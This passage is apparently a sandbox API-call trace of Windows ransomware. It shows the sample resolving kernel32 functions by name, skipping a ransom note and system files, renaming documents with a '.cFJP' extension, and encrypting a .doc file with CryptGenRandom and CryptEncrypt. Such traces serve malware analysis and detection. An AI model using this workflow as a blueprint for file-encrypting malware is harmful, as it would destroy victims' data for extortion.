lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.695] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.695] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.695] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.695] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.695] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.695] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.695] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.695] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.695] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods") returned 94 [0084.695] wsprintfW (in: param_1=0x3f2dc28, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods.cFJP") returned 99 [0084.695] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\5jcfbrhsiwdwqlk.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\5jCFbrHSiWDWqLk.ods.cFJP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\5jcfbrhsiwdwqlk.ods.cfjp"), dwFlags=0x0) returned 1 [0084.696] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.696] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.697] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.697] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaea91080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaea91080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea91080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0084.697] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0084.697] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaea91080, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaea91080, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea91080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0084.697] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0084.697] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.697] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0084.697] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0084.697] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0084.697] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0084.697] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0084.697] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0084.697] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0084.697] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\jkbimi8.tmp" [0084.697] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.698] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0084.698] CloseHandle (hObject=0x0) returned 0 [0084.698] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.698] FindNextFileW (in: hFindFile=0x5f8b18, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae87f50, ftCreationTime.dwHighDateTime=0x1d4ce7e, ftLastAccessTime.dwLowDateTime=0xddbf07a0, ftLastAccessTime.dwHighDateTime=0x1d4cf7e, ftLastWriteTime.dwLowDateTime=0xddbf07a0, ftLastWriteTime.dwHighDateTime=0x1d4cf7e, nFileSizeHigh=0x0, nFileSizeLow=0x16599, dwReserved0=0x0, dwReserved1=0x0, cFileName="puUPAH5A1myMbGOan2W.doc", cAlternateFileName="PUUPAH~1.DOC")) returned 1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="DECRYPT-FILES.txt") returned 1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="autorun.inf") returned 1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="boot.ini") returned 1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="desktop.ini") returned 1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="ntuser.dat") returned 1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="iconcache.db") returned 1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="bootsect.bak") returned 1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="ntuser.dat.log") returned 1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="thumbs.db") returned -1 [0084.698] lstrcmpiW (lpString1="puUPAH5A1myMbGOan2W.doc", lpString2="Bootfont.bin") returned 1 [0084.698] lstrlenW (lpString="puUPAH5A1myMbGOan2W.doc") returned 23 [0084.698] lstrcmpiW (lpString1="doc", lpString2="lnk") returned -1 [0084.698] lstrcmpiW (lpString1="doc", lpString2="exe") returned -1 [0084.698] lstrcmpiW (lpString1="doc", lpString2="sys") returned -1 [0084.698] lstrcmpiW (lpString1="doc", lpString2="dll") returned 1 [0084.699] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned 75 [0084.699] lstrlenW (lpString="puUPAH5A1myMbGOan2W.doc") returned 23 [0084.699] lstrcpyW (in: lpString1=0x3f2e428, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\" [0084.699] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\", lpString2="puUPAH5A1myMbGOan2W.doc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc" [0084.699] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.699] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\narDJcaEcu74Unr7M\\puUPAH5A1myMbGOan2W.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\nardjcaecu74unr7m\\puupah5a1mymbgoan2w.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0084.699] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2dbf0 | out: lpFileSize=0x3f2dbf0*=91545) returned 1 [0084.699] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0084.699] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.699] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.699] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.699] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.700] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2db58*=0x100) returned 1 [0084.700] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0084.701] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.702] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.703] CloseHandle (hObject=0x43c) returned 1 [0084.703] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.703] WriteFile (in: hFile=0x438, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2db78, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2db78*=0x108, lpOverlapped=0x0) returned 1 [0084.704] CloseHandle (hObject=0x0) returned 0 [0084.704] CloseHandle (hObject=0x438) returned 1 [0084.704] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.704] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.704] GetTickCount () returned 0x114da39 [0084.705] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.705] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.705] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.705] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.706] lstrlenA (lpString="kernel32.dll") returned 12 [0084.706] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.706] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.706] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.706] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.706] lstrlenA (lpString="ADDATOMA") returned 8 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.706] lstrlenA (lpString="ADDATOMW") returned 8 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.706] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.706] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.706] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.706] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.706] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.706] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.706] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.707] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.707] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.707] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.707] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.707] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.707] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.707] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.707] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0084.707] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0084.707] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0084.707] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0084.707] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0084.707] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0084.707] lstrlenA (lpString="BACKUPREAD") returned 10 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0084.707] lstrlenA (lpString="BACKUPSEEK") returned 10 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0084.707] lstrlenA (lpString="BACKUPWRITE") returned 11 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0084.707] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0084.707] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0084.707] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0084.708] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0084.708] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0084.708] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0084.708] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0084.708] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0084.708] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0084.708] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0084.708] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0084.708] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0084.708] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0084.708] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0084.708] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0084.708] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0084.708] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0084.708] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0084.708] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0084.708] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0084.708] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0084.708] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0084.709] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0084.709] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0084.709] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0084.709] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0084.709] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0084.709] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0084.709] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0084.709] lstrlenA (lpString="BEEP") returned 4 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0084.709] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0084.709] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: 